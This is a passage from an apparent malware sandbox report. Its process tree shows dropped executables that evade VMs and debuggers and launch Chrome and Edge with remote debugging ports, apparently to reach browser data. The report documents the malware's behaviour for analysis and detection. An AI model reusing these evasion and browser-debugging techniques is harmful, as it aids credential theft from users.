        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
        7⤵
        
        PID:5544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
        7⤵
        
        PID:5416
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
        7⤵
        
        PID:3748
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:2480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5860
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2256 /prefetch:2
        7⤵
        
        PID:2820
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2508 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5856
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5848
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3388 /prefetch:2
        7⤵
        
        PID:5400
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3464 /prefetch:2
        7⤵
        
        PID:6108
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,14072672766242116156,13973896635822469081,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4944 /prefetch:2
        7⤵
        
        PID:4948
    - - C:\Users\Admin\AppData\Local\Temp\10110000101\ILqcVeT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110000101\ILqcVeT.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:5444
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        
        PID:5736
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe1262cc40,0x7ffe1262cc4c,0x7ffe1262cc58
        7⤵
        
        PID:2824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2404,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2400 /prefetch:2
        7⤵
        
        PID:5292
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1896,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2436 /prefetch:3
        7⤵
        
        PID:4456
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1976,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2540 /prefetch:8
        7⤵
        
        PID:5368
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3124 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3164 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:4072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4416 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5624
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4624,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4656 /prefetch:8
        7⤵
        
        PID:3668
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4680,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4264 /prefetch:8
        7⤵
        
        PID:2076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4652,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:8
        7⤵
        
        PID:4044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8
        7⤵
        
        PID:3984
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:8
        7⤵
        
        PID:6092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5188,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5196 /prefetch:8
        7⤵
        
        PID:1308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5336,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5192 /prefetch:8
        7⤵
        
        PID:5600
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5436,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5180 /prefetch:8
        7⤵
        
        PID:1632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4752,i,10790777383518598604,17666170064959689412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5392 /prefetch:2
        7⤵
        Uses browser remote debugging
        
        PID:3872
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:5768
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe127e46f8,0x7ffe127e4708,0x7ffe127e4718
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
        7⤵
        
        PID:5596
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
        7⤵
        
        PID:2420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
        7⤵
        
        PID:2020
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5272
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
        7⤵
        
        PID:3232
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
        7⤵
        
        PID:5296
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5256
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:4656
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2932 /prefetch:2
        7⤵
        
        PID:3508
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,9746616364264744355,10296628345377937824,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2600 /prefetch:2
        7⤵
        
        PID:5368
    - - C:\Users\Admin\AppData\Local\Temp\10110010101\nhDLtPT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110010101\nhDLtPT.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3356
      - C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2512
    - - C:\Users\Admin\AppData\Local\Temp\10110020101\Ps7WqSx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110020101\Ps7WqSx.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6080
    - - C:\Users\Admin\AppData\Local\Temp\10110030101\FvbuInU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110030101\FvbuInU.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:6000
    - - C:\Users\Admin\AppData\Local\Temp\10110040101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110040101\mAtJWNv.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5816
      - C:\Users\Admin\AppData\Local\Temp\10110040101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110040101\mAtJWNv.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:1708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        
        PID:1624
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe1280cc40,0x7ffe1280cc4c,0x7ffe1280cc58
        8⤵
        
        PID:2264
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2400,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2396 /prefetch:2
        8⤵
        
        PID:3332
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1900,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2484 /prefetch:3
        8⤵
        
        PID:5560
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1976,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2612 /prefetch:8
        8⤵
        
        PID:2900
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2364
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4548,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4496 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4332
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4292,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4296 /prefetch:8
        8⤵
        
        PID:628
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
